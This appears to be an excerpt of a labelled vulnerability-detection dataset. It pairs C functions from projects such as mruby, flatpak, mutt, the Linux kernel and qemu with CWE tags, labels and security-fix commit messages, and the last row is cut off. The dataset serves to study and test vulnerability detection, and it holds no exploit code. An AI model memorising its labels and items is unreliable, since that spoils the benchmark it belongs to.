func
stringlengths 0
484k
| target
int64 0
1
| cwe
listlengths 0
4
| project
stringclasses 799
values | commit_id
stringlengths 40
40
| hash
float64 1,215,700,430,453,689,100,000,000B
340,281,914,521,452,260,000,000,000,000B
| size
int64 1
24k
| message
stringlengths 0
13.3k
|
---|---|---|---|---|---|---|---|
mrb_yield_with_class(mrb_state *mrb, mrb_value b, mrb_int argc, const mrb_value *argv, mrb_value self, struct RClass *c)
{
struct RProc *p;
mrb_sym mid = mrb->c->ci->mid;
mrb_callinfo *ci;
mrb_value val;
mrb_int n;
check_block(mrb, b);
ci = mrb->c->ci;
n = mrb_ci_nregs(ci);
p = mrb_proc_ptr(b);
ci = cipush(mrb, n, CINFO_SKIP, c, p, mid, 0 /* dummy */);
ci->nk = 0;
if (argc >= CALL_MAXARGS) {
ci->n = 15;
n = 3;
}
else {
ci->n = (uint8_t)argc;
n = argc + 2;
}
mrb_stack_extend(mrb, n);
mrb->c->ci->stack[0] = self;
if (ci->n == 15) {
mrb->c->ci->stack[1] = mrb_ary_new_from_values(mrb, argc, argv);
argc = 1;
}
else if (argc > 0) {
stack_copy(mrb->c->ci->stack+1, argv, argc);
}
mrb->c->ci->stack[argc+1] = mrb_nil_value(); /* clear blk */
if (MRB_PROC_CFUNC_P(p)) {
ci->cci = CINFO_DIRECT;
val = MRB_PROC_CFUNC(p)(mrb, self);
cipop(mrb);
}
else {
val = mrb_run(mrb, p, self);
}
return val;
}
| 0 |
[
"CWE-703",
"CWE-125"
] |
mruby
|
a4d97934d51cb88954cc49161dc1d151f64afb6b
| 54,608,613,763,983,400,000,000,000,000,000,000,000 | 43 |
vm.c: check if target_class is NULL (when prepended).
|
flatpak_run_add_x11_args (FlatpakBwrap *bwrap,
gboolean allowed)
{
g_autofree char *x11_socket = NULL;
const char *display;
/* Always cover /tmp/.X11-unix, that way we never see the host one in case
* we have access to the host /tmp. If you request X access we'll put the right
* thing in this anyway.
*/
flatpak_bwrap_add_args (bwrap,
"--tmpfs", "/tmp/.X11-unix",
NULL);
if (!allowed)
{
flatpak_bwrap_unset_env (bwrap, "DISPLAY");
return;
}
g_debug ("Allowing x11 access");
display = g_getenv ("DISPLAY");
if (display && display[0] == ':' && g_ascii_isdigit (display[1]))
{
const char *display_nr = &display[1];
const char *display_nr_end = display_nr;
g_autofree char *d = NULL;
while (g_ascii_isdigit (*display_nr_end))
display_nr_end++;
d = g_strndup (display_nr, display_nr_end - display_nr);
x11_socket = g_strdup_printf ("/tmp/.X11-unix/X%s", d);
flatpak_bwrap_add_args (bwrap,
"--ro-bind", x11_socket, "/tmp/.X11-unix/X99",
NULL);
flatpak_bwrap_set_env (bwrap, "DISPLAY", ":99.0", TRUE);
#ifdef ENABLE_XAUTH
g_auto(GLnxTmpfile) xauth_tmpf = { 0, };
if (glnx_open_anonymous_tmpfile_full (O_RDWR | O_CLOEXEC, "/tmp", &xauth_tmpf, NULL))
{
FILE *output = fdopen (xauth_tmpf.fd, "wb");
if (output != NULL)
{
/* fd is now owned by output, steal it from the tmpfile */
int tmp_fd = dup (glnx_steal_fd (&xauth_tmpf.fd));
if (tmp_fd != -1)
{
g_autofree char *dest = g_strdup_printf ("/run/user/%d/Xauthority", getuid ());
write_xauth (d, output);
flatpak_bwrap_add_args_data_fd (bwrap, "--ro-bind-data", tmp_fd, dest);
flatpak_bwrap_set_env (bwrap, "XAUTHORITY", dest, TRUE);
}
fclose (output);
if (tmp_fd != -1)
lseek (tmp_fd, 0, SEEK_SET);
}
}
#endif
}
else
{
flatpak_bwrap_unset_env (bwrap, "DISPLAY");
}
}
| 0 |
[
"CWE-94",
"CWE-74"
] |
flatpak
|
6d1773d2a54dde9b099043f07a2094a4f1c2f486
| 290,646,567,425,464,700,000,000,000,000,000,000,000 | 73 |
run: Convert all environment variables into bwrap arguments
This avoids some of them being filtered out by a setuid bwrap. It also
means that if they came from an untrusted source, they cannot be used
to inject arbitrary code into a non-setuid bwrap via mechanisms like
LD_PRELOAD.
Because they get bundled into a memfd or temporary file, they do not
actually appear in argv, ensuring that they remain inaccessible to
processes running under a different uid (which is important if their
values are tokens or other secrets).
Signed-off-by: Simon McVittie <[email protected]>
Part-of: https://github.com/flatpak/flatpak/security/advisories/GHSA-4ppf-fxf6-vxg2
|
GF_Err fdpa_Write(GF_Box *s, GF_BitStream *bs)
{
u32 i;
GF_FDpacketBox *ptr = (GF_FDpacketBox *) s;
if (!s) return GF_BAD_PARAM;
gf_bs_write_int(bs, ptr->info.sender_current_time_present, 1);
gf_bs_write_int(bs, ptr->info.expected_residual_time_present, 1);
gf_bs_write_int(bs, ptr->info.session_close_bit, 1);
gf_bs_write_int(bs, ptr->info.object_close_bit, 1);
gf_bs_write_int(bs, 0, 4);
ptr->info.transport_object_identifier = gf_bs_read_u16(bs);
gf_bs_write_u16(bs, ptr->header_ext_count);
for (i=0; i<ptr->header_ext_count; i++) {
gf_bs_write_u8(bs, ptr->headers[i].header_extension_type);
if (ptr->headers[i].header_extension_type > 127) {
gf_bs_write_data(bs, (const char *) ptr->headers[i].content, 3);
} else {
gf_bs_write_u8(bs, ptr->headers[i].data_length ? (ptr->headers[i].data_length+2)/4 : 0);
if (ptr->headers[i].data_length) {
gf_bs_write_data(bs, ptr->headers[i].data, ptr->headers[i].data_length);
}
}
}
return GF_OK;
}
| 0 |
[
"CWE-125"
] |
gpac
|
bceb03fd2be95097a7b409ea59914f332fb6bc86
| 142,569,144,363,937,850,000,000,000,000,000,000,000 | 26 |
fixed 2 possible heap overflows (inc. #1088)
|
proxy_C_SignEncryptUpdate (CK_X_FUNCTION_LIST *self,
CK_SESSION_HANDLE handle,
CK_BYTE_PTR part,
CK_ULONG part_len,
CK_BYTE_PTR enc_part,
CK_ULONG_PTR enc_part_len)
{
State *state = (State *)self;
Mapping map;
CK_RV rv;
rv = map_session_to_real (state->px, &handle, &map, NULL);
if (rv != CKR_OK)
return rv;
return (map.funcs->C_SignEncryptUpdate) (handle, part, part_len, enc_part, enc_part_len);
}
| 0 |
[
"CWE-190"
] |
p11-kit
|
5307a1d21a50cacd06f471a873a018d23ba4b963
| 217,384,927,202,003,740,000,000,000,000,000,000,000 | 16 |
Check for arithmetic overflows before allocating
|
static void x509_fingerprint (char *s, int l, X509 * cert, const EVP_MD *(*hashfunc)(void))
{
unsigned char md[EVP_MAX_MD_SIZE];
unsigned int n;
int j;
if (!X509_digest (cert, hashfunc(), md, &n))
{
snprintf (s, l, "%s", _("[unable to calculate]"));
}
else
{
for (j = 0; j < (int) n; j++)
{
char ch[8];
snprintf (ch, 8, "%02X%s", md[j], (j % 2 ? " " : ""));
safe_strcat (s, l, ch);
}
}
}
| 0 |
[
"CWE-74"
] |
mutt
|
c547433cdf2e79191b15c6932c57f1472bfb5ff4
| 337,792,773,824,526,300,000,000,000,000,000,000,000 | 20 |
Fix STARTTLS response injection attack.
Thanks again to Damian Poddebniak and Fabian Ising from the Münster
University of Applied Sciences for reporting this issue. Their
summary in ticket 248 states the issue clearly:
We found another STARTTLS-related issue in Mutt. Unfortunately, it
affects SMTP, POP3 and IMAP.
When the server responds with its "let's do TLS now message", e.g. A
OK begin TLS\r\n in IMAP or +OK begin TLS\r\n in POP3, Mutt will
also read any data after the \r\n and save it into some internal
buffer for later processing. This is problematic, because a MITM
attacker can inject arbitrary responses.
There is a nice blogpost by Wietse Venema about a "command
injection" in postfix (http://www.postfix.org/CVE-2011-0411.html).
What we have here is the problem in reverse, i.e. not a command
injection, but a "response injection."
This commit fixes the issue by clearing the CONNECTION input buffer in
mutt_ssl_starttls().
To make backporting this fix easier, the new functions only clear the
top-level CONNECTION buffer; they don't handle nested buffering in
mutt_zstrm.c or mutt_sasl.c. However both of those wrap the
connection *after* STARTTLS, so this is currently okay. mutt_tunnel.c
occurs before connecting, but it does not perform any nesting.
|
static int ext3_commit_super(struct super_block *sb,
struct ext3_super_block *es,
int sync)
{
struct buffer_head *sbh = EXT3_SB(sb)->s_sbh;
int error = 0;
if (!sbh)
return error;
if (buffer_write_io_error(sbh)) {
/*
* Oh, dear. A previous attempt to write the
* superblock failed. This could happen because the
* USB device was yanked out. Or it could happen to
* be a transient write error and maybe the block will
* be remapped. Nothing we can do but to retry the
* write and hope for the best.
*/
ext3_msg(sb, KERN_ERR, "previous I/O error to "
"superblock detected");
clear_buffer_write_io_error(sbh);
set_buffer_uptodate(sbh);
}
/*
* If the file system is mounted read-only, don't update the
* superblock write time. This avoids updating the superblock
* write time when we are mounting the root file system
* read/only but we need to replay the journal; at that point,
* for people who are east of GMT and who make their clock
* tick in localtime for Windows bug-for-bug compatibility,
* the clock is set in the future, and this will cause e2fsck
* to complain and force a full file system check.
*/
if (!(sb->s_flags & MS_RDONLY))
es->s_wtime = cpu_to_le32(get_seconds());
es->s_free_blocks_count = cpu_to_le32(ext3_count_free_blocks(sb));
es->s_free_inodes_count = cpu_to_le32(ext3_count_free_inodes(sb));
BUFFER_TRACE(sbh, "marking dirty");
mark_buffer_dirty(sbh);
if (sync) {
error = sync_dirty_buffer(sbh);
if (buffer_write_io_error(sbh)) {
ext3_msg(sb, KERN_ERR, "I/O error while writing "
"superblock");
clear_buffer_write_io_error(sbh);
set_buffer_uptodate(sbh);
}
}
return error;
}
| 0 |
[
"CWE-20"
] |
linux
|
8d0c2d10dd72c5292eda7a06231056a4c972e4cc
| 305,901,677,406,415,840,000,000,000,000,000,000,000 | 51 |
ext3: Fix format string issues
ext3_msg() takes the printk prefix as the second parameter and the
format string as the third parameter. Two callers of ext3_msg omit the
prefix and pass the format string as the second parameter and the first
parameter to the format string as the third parameter. In both cases
this string comes from an arbitrary source. Which means the string may
contain format string characters, which will
lead to undefined and potentially harmful behavior.
The issue was introduced in commit 4cf46b67eb("ext3: Unify log messages
in ext3") and is fixed by this patch.
CC: [email protected]
Signed-off-by: Lars-Peter Clausen <[email protected]>
Signed-off-by: Jan Kara <[email protected]>
|
static int udf_read_inode(struct inode *inode, bool hidden_inode)
{
struct buffer_head *bh = NULL;
struct fileEntry *fe;
struct extendedFileEntry *efe;
uint16_t ident;
struct udf_inode_info *iinfo = UDF_I(inode);
struct udf_sb_info *sbi = UDF_SB(inode->i_sb);
struct kernel_lb_addr *iloc = &iinfo->i_location;
unsigned int link_count;
unsigned int indirections = 0;
int bs = inode->i_sb->s_blocksize;
int ret = -EIO;
uint32_t uid, gid;
reread:
if (iloc->partitionReferenceNum >= sbi->s_partitions) {
udf_debug("partition reference: %u > logical volume partitions: %u\n",
iloc->partitionReferenceNum, sbi->s_partitions);
return -EIO;
}
if (iloc->logicalBlockNum >=
sbi->s_partmaps[iloc->partitionReferenceNum].s_partition_len) {
udf_debug("block=%u, partition=%u out of range\n",
iloc->logicalBlockNum, iloc->partitionReferenceNum);
return -EIO;
}
/*
* Set defaults, but the inode is still incomplete!
* Note: get_new_inode() sets the following on a new inode:
* i_sb = sb
* i_no = ino
* i_flags = sb->s_flags
* i_state = 0
* clean_inode(): zero fills and sets
* i_count = 1
* i_nlink = 1
* i_op = NULL;
*/
bh = udf_read_ptagged(inode->i_sb, iloc, 0, &ident);
if (!bh) {
udf_err(inode->i_sb, "(ino %lu) failed !bh\n", inode->i_ino);
return -EIO;
}
if (ident != TAG_IDENT_FE && ident != TAG_IDENT_EFE &&
ident != TAG_IDENT_USE) {
udf_err(inode->i_sb, "(ino %lu) failed ident=%u\n",
inode->i_ino, ident);
goto out;
}
fe = (struct fileEntry *)bh->b_data;
efe = (struct extendedFileEntry *)bh->b_data;
if (fe->icbTag.strategyType == cpu_to_le16(4096)) {
struct buffer_head *ibh;
ibh = udf_read_ptagged(inode->i_sb, iloc, 1, &ident);
if (ident == TAG_IDENT_IE && ibh) {
struct kernel_lb_addr loc;
struct indirectEntry *ie;
ie = (struct indirectEntry *)ibh->b_data;
loc = lelb_to_cpu(ie->indirectICB.extLocation);
if (ie->indirectICB.extLength) {
brelse(ibh);
memcpy(&iinfo->i_location, &loc,
sizeof(struct kernel_lb_addr));
if (++indirections > UDF_MAX_ICB_NESTING) {
udf_err(inode->i_sb,
"too many ICBs in ICB hierarchy"
" (max %d supported)\n",
UDF_MAX_ICB_NESTING);
goto out;
}
brelse(bh);
goto reread;
}
}
brelse(ibh);
} else if (fe->icbTag.strategyType != cpu_to_le16(4)) {
udf_err(inode->i_sb, "unsupported strategy type: %u\n",
le16_to_cpu(fe->icbTag.strategyType));
goto out;
}
if (fe->icbTag.strategyType == cpu_to_le16(4))
iinfo->i_strat4096 = 0;
else /* if (fe->icbTag.strategyType == cpu_to_le16(4096)) */
iinfo->i_strat4096 = 1;
iinfo->i_alloc_type = le16_to_cpu(fe->icbTag.flags) &
ICBTAG_FLAG_AD_MASK;
if (iinfo->i_alloc_type != ICBTAG_FLAG_AD_SHORT &&
iinfo->i_alloc_type != ICBTAG_FLAG_AD_LONG &&
iinfo->i_alloc_type != ICBTAG_FLAG_AD_IN_ICB) {
ret = -EIO;
goto out;
}
iinfo->i_unique = 0;
iinfo->i_lenEAttr = 0;
iinfo->i_lenExtents = 0;
iinfo->i_lenAlloc = 0;
iinfo->i_next_alloc_block = 0;
iinfo->i_next_alloc_goal = 0;
if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_EFE)) {
iinfo->i_efe = 1;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs -
sizeof(struct extendedFileEntry));
if (ret)
goto out;
memcpy(iinfo->i_data,
bh->b_data + sizeof(struct extendedFileEntry),
bs - sizeof(struct extendedFileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_FE)) {
iinfo->i_efe = 0;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs - sizeof(struct fileEntry));
if (ret)
goto out;
memcpy(iinfo->i_data,
bh->b_data + sizeof(struct fileEntry),
bs - sizeof(struct fileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_USE)) {
iinfo->i_efe = 0;
iinfo->i_use = 1;
iinfo->i_lenAlloc = le32_to_cpu(
((struct unallocSpaceEntry *)bh->b_data)->
lengthAllocDescs);
ret = udf_alloc_i_data(inode, bs -
sizeof(struct unallocSpaceEntry));
if (ret)
goto out;
memcpy(iinfo->i_data,
bh->b_data + sizeof(struct unallocSpaceEntry),
bs - sizeof(struct unallocSpaceEntry));
return 0;
}
ret = -EIO;
read_lock(&sbi->s_cred_lock);
uid = le32_to_cpu(fe->uid);
if (uid == UDF_INVALID_ID ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_UID_SET))
inode->i_uid = sbi->s_uid;
else
i_uid_write(inode, uid);
gid = le32_to_cpu(fe->gid);
if (gid == UDF_INVALID_ID ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_GID_SET))
inode->i_gid = sbi->s_gid;
else
i_gid_write(inode, gid);
if (fe->icbTag.fileType != ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_fmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_fmode;
else if (fe->icbTag.fileType == ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_dmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_dmode;
else
inode->i_mode = udf_convert_permissions(fe);
inode->i_mode &= ~sbi->s_umask;
iinfo->i_extraPerms = le32_to_cpu(fe->permissions) & ~FE_MAPPED_PERMS;
read_unlock(&sbi->s_cred_lock);
link_count = le16_to_cpu(fe->fileLinkCount);
if (!link_count) {
if (!hidden_inode) {
ret = -ESTALE;
goto out;
}
link_count = 1;
}
set_nlink(inode, link_count);
inode->i_size = le64_to_cpu(fe->informationLength);
iinfo->i_lenExtents = inode->i_size;
if (iinfo->i_efe == 0) {
inode->i_blocks = le64_to_cpu(fe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
udf_disk_stamp_to_time(&inode->i_atime, fe->accessTime);
udf_disk_stamp_to_time(&inode->i_mtime, fe->modificationTime);
udf_disk_stamp_to_time(&inode->i_ctime, fe->attrTime);
iinfo->i_unique = le64_to_cpu(fe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(fe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(fe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(fe->checkpoint);
iinfo->i_streamdir = 0;
iinfo->i_lenStreams = 0;
} else {
inode->i_blocks = le64_to_cpu(efe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
udf_disk_stamp_to_time(&inode->i_atime, efe->accessTime);
udf_disk_stamp_to_time(&inode->i_mtime, efe->modificationTime);
udf_disk_stamp_to_time(&iinfo->i_crtime, efe->createTime);
udf_disk_stamp_to_time(&inode->i_ctime, efe->attrTime);
iinfo->i_unique = le64_to_cpu(efe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(efe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(efe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(efe->checkpoint);
/* Named streams */
iinfo->i_streamdir = (efe->streamDirectoryICB.extLength != 0);
iinfo->i_locStreamdir =
lelb_to_cpu(efe->streamDirectoryICB.extLocation);
iinfo->i_lenStreams = le64_to_cpu(efe->objectSize);
if (iinfo->i_lenStreams >= inode->i_size)
iinfo->i_lenStreams -= inode->i_size;
else
iinfo->i_lenStreams = 0;
}
inode->i_generation = iinfo->i_unique;
/*
* Sanity check length of allocation descriptors and extended attrs to
* avoid integer overflows
*/
if (iinfo->i_lenEAttr > bs || iinfo->i_lenAlloc > bs)
goto out;
/* Now do exact checks */
if (udf_file_entry_alloc_offset(inode) + iinfo->i_lenAlloc > bs)
goto out;
/* Sanity checks for files in ICB so that we don't get confused later */
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
/*
* For file in ICB data is stored in allocation descriptor
* so sizes should match
*/
if (iinfo->i_lenAlloc != inode->i_size)
goto out;
/* File in ICB has to fit in there... */
if (inode->i_size > bs - udf_file_entry_alloc_offset(inode))
goto out;
}
switch (fe->icbTag.fileType) {
case ICBTAG_FILE_TYPE_DIRECTORY:
inode->i_op = &udf_dir_inode_operations;
inode->i_fop = &udf_dir_operations;
inode->i_mode |= S_IFDIR;
inc_nlink(inode);
break;
case ICBTAG_FILE_TYPE_REALTIME:
case ICBTAG_FILE_TYPE_REGULAR:
case ICBTAG_FILE_TYPE_UNDEF:
case ICBTAG_FILE_TYPE_VAT20:
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
inode->i_data.a_ops = &udf_adinicb_aops;
else
inode->i_data.a_ops = &udf_aops;
inode->i_op = &udf_file_inode_operations;
inode->i_fop = &udf_file_operations;
inode->i_mode |= S_IFREG;
break;
case ICBTAG_FILE_TYPE_BLOCK:
inode->i_mode |= S_IFBLK;
break;
case ICBTAG_FILE_TYPE_CHAR:
inode->i_mode |= S_IFCHR;
break;
case ICBTAG_FILE_TYPE_FIFO:
init_special_inode(inode, inode->i_mode | S_IFIFO, 0);
break;
case ICBTAG_FILE_TYPE_SOCKET:
init_special_inode(inode, inode->i_mode | S_IFSOCK, 0);
break;
case ICBTAG_FILE_TYPE_SYMLINK:
inode->i_data.a_ops = &udf_symlink_aops;
inode->i_op = &udf_symlink_inode_operations;
inode_nohighmem(inode);
inode->i_mode = S_IFLNK | 0777;
break;
case ICBTAG_FILE_TYPE_MAIN:
udf_debug("METADATA FILE-----\n");
break;
case ICBTAG_FILE_TYPE_MIRROR:
udf_debug("METADATA MIRROR FILE-----\n");
break;
case ICBTAG_FILE_TYPE_BITMAP:
udf_debug("METADATA BITMAP FILE-----\n");
break;
default:
udf_err(inode->i_sb, "(ino %lu) failed unknown file type=%u\n",
inode->i_ino, fe->icbTag.fileType);
goto out;
}
if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
struct deviceSpec *dsea =
(struct deviceSpec *)udf_get_extendedattr(inode, 12, 1);
if (dsea) {
init_special_inode(inode, inode->i_mode,
MKDEV(le32_to_cpu(dsea->majorDeviceIdent),
le32_to_cpu(dsea->minorDeviceIdent)));
/* Developer ID ??? */
} else
goto out;
}
ret = 0;
out:
brelse(bh);
return ret;
}
| 0 |
[
"CWE-476"
] |
linux
|
7fc3b7c2981bbd1047916ade327beccb90994eee
| 175,314,281,740,430,700,000,000,000,000,000,000,000 | 314 |
udf: Fix NULL ptr deref when converting from inline format
udf_expand_file_adinicb() calls directly ->writepage to write data
expanded into a page. This however misses to setup inode for writeback
properly and so we can crash on inode->i_wb dereference when submitting
page for IO like:
BUG: kernel NULL pointer dereference, address: 0000000000000158
#PF: supervisor read access in kernel mode
...
<TASK>
__folio_start_writeback+0x2ac/0x350
__block_write_full_page+0x37d/0x490
udf_expand_file_adinicb+0x255/0x400 [udf]
udf_file_write_iter+0xbe/0x1b0 [udf]
new_sync_write+0x125/0x1c0
vfs_write+0x28e/0x400
Fix the problem by marking the page dirty and going through the standard
writeback path to write the page. Strictly speaking we would not even
have to write the page but we want to catch e.g. ENOSPC errors early.
Reported-by: butt3rflyh4ck <[email protected]>
CC: [email protected]
Fixes: 52ebea749aae ("writeback: make backing_dev_info host cgroup-specific bdi_writebacks")
Reviewed-by: Christoph Hellwig <[email protected]>
Signed-off-by: Jan Kara <[email protected]>
|
ldns_zone_print(FILE *output, const ldns_zone *z)
{
ldns_zone_print_fmt(output, ldns_output_format_default, z);
}
| 0 |
[
"CWE-415"
] |
ldns
|
070b4595981f48a21cc6b4f5047fdc2d09d3da91
| 50,600,514,562,499,790,000,000,000,000,000,000,000 | 4 |
CAA and URI
|
static void do_cmd(ESPState *s)
{
uint8_t busid = esp_fifo_pop(&s->cmdfifo);
int len;
s->cmdfifo_cdb_offset--;
/* Ignore extended messages for now */
if (s->cmdfifo_cdb_offset) {
len = MIN(s->cmdfifo_cdb_offset, fifo8_num_used(&s->cmdfifo));
esp_fifo_pop_buf(&s->cmdfifo, NULL, len);
s->cmdfifo_cdb_offset = 0;
}
do_busid_cmd(s, busid);
}
| 0 |
[
"CWE-476"
] |
qemu
|
fa7505c154d4d00ad89a747be2eda556643ce00e
| 171,579,351,228,276,600,000,000,000,000,000,000,000 | 16 |
esp: don't underflow cmdfifo in do_cmd()
If the guest tries to execute a CDB when cmdfifo is not empty before the start
of the message out phase then clearing the message out phase data will cause
cmdfifo to underflow due to cmdfifo_cdb_offset being larger than the amount of
data within.
Since this can only occur by issuing deliberately incorrect instruction
sequences, ensure that the maximum length of esp_fifo_pop_buf() is limited to
the size of the data within cmdfifo.
Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
Signed-off-by: Mark Cave-Ayland <[email protected]>
Reviewed-by: Philippe Mathieu-Daudé <[email protected]>
Tested-by: Alexander Bulekov <[email protected]>
Message-Id: <[email protected]>
|
static int ext4_drop_inode(struct inode *inode)
{
int drop = generic_drop_inode(inode);
trace_ext4_drop_inode(inode, drop);
return drop;
}
| 0 |
[
"CWE-362"
] |
linux
|
ea3d7209ca01da209cda6f0dea8be9cc4b7a933b
| 316,157,308,949,287,700,000,000,000,000,000,000,000 | 7 |
ext4: fix races between page faults and hole punching
Currently, page faults and hole punching are completely unsynchronized.
This can result in page fault faulting in a page into a range that we
are punching after truncate_pagecache_range() has been called and thus
we can end up with a page mapped to disk blocks that will be shortly
freed. Filesystem corruption will shortly follow. Note that the same
race is avoided for truncate by checking page fault offset against
i_size but there isn't similar mechanism available for punching holes.
Fix the problem by creating new rw semaphore i_mmap_sem in inode and
grab it for writing over truncate, hole punching, and other functions
removing blocks from extent tree and for read over page faults. We
cannot easily use i_data_sem for this since that ranks below transaction
start and we need something ranking above it so that it can be held over
the whole truncate / hole punching operation. Also remove various
workarounds we had in the code to reduce race window when page fault
could have created pages with stale mapping information.
Signed-off-by: Jan Kara <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
|
mbfl_buffer_converter_strncat(mbfl_buffer_converter *convd, const unsigned char *p, int n)
{
mbfl_convert_filter *filter;
int (*filter_function)(int c, mbfl_convert_filter *filter);
if (convd != NULL && p != NULL) {
filter = convd->filter1;
if (filter != NULL) {
filter_function = filter->filter_function;
while (n > 0) {
if ((*filter_function)(*p++, filter) < 0) {
break;
}
n--;
}
}
}
return n;
}
| 0 |
[
"CWE-119"
] |
php-src
|
64f42c73efc58e88671ad76b6b6bc8e2b62713e1
| 330,194,490,754,083,750,000,000,000,000,000,000,000 | 20 |
Fixed bug #71906: AddressSanitizer: negative-size-param (-1) in mbfl_strcut
|
static RBinPlugin *get_plugin_from_buffer(RBin *bin, RBinFile *bf, const char *pluginname, RBuffer *buf) {
RBinPlugin *plugin = bin->force? r_bin_get_binplugin_by_name (bin, bin->force): NULL;
if (plugin) {
return plugin;
}
plugin = pluginname? r_bin_get_binplugin_by_name (bin, pluginname): NULL;
if (plugin) {
return plugin;
}
plugin = r_bin_get_binplugin_by_buffer (bin, bf, buf);
if (plugin) {
return plugin;
}
return r_bin_get_binplugin_by_name (bin, "any");
}
| 0 |
[
"CWE-125"
] |
radare2
|
193f4fe01d7f626e2ea937450f2e0c4604420e9d
| 215,812,811,139,165,700,000,000,000,000,000,000,000 | 15 |
Fix integer overflow in string search causing oobread ##crash
* Reported by @greatergoodest via huntrdev
* BountyID: 8a3dc5cb-08b3-4807-82b2-77f08c137a04
* Reproducer bfileovf
|
static int xfrm6_tunnel_rcv(struct sk_buff *skb)
{
struct net *net = dev_net(skb->dev);
const struct ipv6hdr *iph = ipv6_hdr(skb);
__be32 spi;
spi = xfrm6_tunnel_spi_lookup(net, (const xfrm_address_t *)&iph->saddr);
return xfrm6_rcv_spi(skb, IPPROTO_IPV6, spi, NULL);
}
| 0 |
[
"CWE-416"
] |
linux
|
dbb2483b2a46fbaf833cfb5deb5ed9cace9c7399
| 96,672,992,975,476,900,000,000,000,000,000,000,000 | 9 |
xfrm: clean up xfrm protocol checks
In commit 6a53b7593233 ("xfrm: check id proto in validate_tmpl()")
I introduced a check for xfrm protocol, but according to Herbert
IPSEC_PROTO_ANY should only be used as a wildcard for lookup, so
it should be removed from validate_tmpl().
And, IPSEC_PROTO_ANY is expected to only match 3 IPSec-specific
protocols, this is why xfrm_state_flush() could still miss
IPPROTO_ROUTING, which leads that those entries are left in
net->xfrm.state_all before exit net. Fix this by replacing
IPSEC_PROTO_ANY with zero.
This patch also extracts the check from validate_tmpl() to
xfrm_id_proto_valid() and uses it in parse_ipsecrequest().
With this, no other protocols should be added into xfrm.
Fixes: 6a53b7593233 ("xfrm: check id proto in validate_tmpl()")
Reported-by: [email protected]
Cc: Steffen Klassert <[email protected]>
Cc: Herbert Xu <[email protected]>
Signed-off-by: Cong Wang <[email protected]>
Acked-by: Herbert Xu <[email protected]>
Signed-off-by: Steffen Klassert <[email protected]>
|
write_short_policy(const short_policy_t *policy)
{
int i;
char *answer;
smartlist_t *sl = smartlist_new();
smartlist_add_asprintf(sl, "%s", policy->is_accept ? "accept " : "reject ");
for (i=0; i < policy->n_entries; i++) {
const short_policy_entry_t *e = &policy->entries[i];
if (e->min_port == e->max_port) {
smartlist_add_asprintf(sl, "%d", e->min_port);
} else {
smartlist_add_asprintf(sl, "%d-%d", e->min_port, e->max_port);
}
if (i < policy->n_entries-1)
smartlist_add(sl, tor_strdup(","));
}
answer = smartlist_join_strings(sl, "", 0, NULL);
SMARTLIST_FOREACH(sl, char *, a, tor_free(a));
smartlist_free(sl);
return answer;
}
| 0 |
[] |
tor
|
1afc2ed956a35b40dfd1d207652af5b50c295da7
| 73,785,717,287,477,060,000,000,000,000,000,000,000 | 23 |
Fix policies.c instance of the "if (r=(a-b)) return r" pattern
I think this one probably can't underflow, since the input ranges
are small. But let's not tempt fate.
This patch also replaces the "cmp" functions here with just "eq"
functions, since nothing actually checked for anything besides 0 and
nonzero.
Related to 21278.
|
static inline void tcp_mark_push(struct tcp_sock *tp, struct sk_buff *skb)
{
TCP_SKB_CB(skb)->flags |= TCPCB_FLAG_PSH;
tp->pushed_seq = tp->write_seq;
}
| 0 |
[
"CWE-400",
"CWE-119",
"CWE-703"
] |
linux
|
baff42ab1494528907bf4d5870359e31711746ae
| 307,963,994,136,587,300,000,000,000,000,000,000,000 | 5 |
net: Fix oops from tcp_collapse() when using splice()
tcp_read_sock() can have a eat skbs without immediately advancing copied_seq.
This can cause a panic in tcp_collapse() if it is called as a result
of the recv_actor dropping the socket lock.
A userspace program that splices data from a socket to either another
socket or to a file can trigger this bug.
Signed-off-by: Steven J. Magnani <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static const char *get_type_string(cmark_syntax_extension *self,
cmark_node *node) {
if (node->type == CMARK_NODE_TABLE) {
return "table";
} else if (node->type == CMARK_NODE_TABLE_ROW) {
if (((node_table_row *)node->as.opaque)->is_header)
return "table_header";
else
return "table_row";
} else if (node->type == CMARK_NODE_TABLE_CELL) {
return "table_cell";
}
return "<unknown>";
}
| 0 |
[
"CWE-190"
] |
cmark-gfm
|
b1687e6af1367c596ab75428b03af55666a66530
| 301,795,908,842,409,170,000,000,000,000,000,000,000 | 15 |
prevent integer overflow in row_from_string
* added explicit check for UINT16_MAX boundary on row->n_columns
* added additional checks for row_from_string NULL returns to prevent NULL
dereferences on error cases
* added additional check to ensure n_columns between marker and header rows
always match prior to any alignment processing
* allocate alignment array based on marker rows rather than header rows
* prevent memory leak on dangling node when encountering row_from_string
error in try_opening_table_row
* add explicit integer overflow error marker to not overload offset semantics
in row_from_string with other implied error conditions
|
ares_parse_naptr_reply (const unsigned char *abuf, int alen,
struct ares_naptr_reply **naptr_out)
{
unsigned int qdcount, ancount, i;
const unsigned char *aptr, *vptr;
int status, rr_type, rr_class, rr_len;
long len;
char *hostname = NULL, *rr_name = NULL;
struct ares_naptr_reply *naptr_head = NULL;
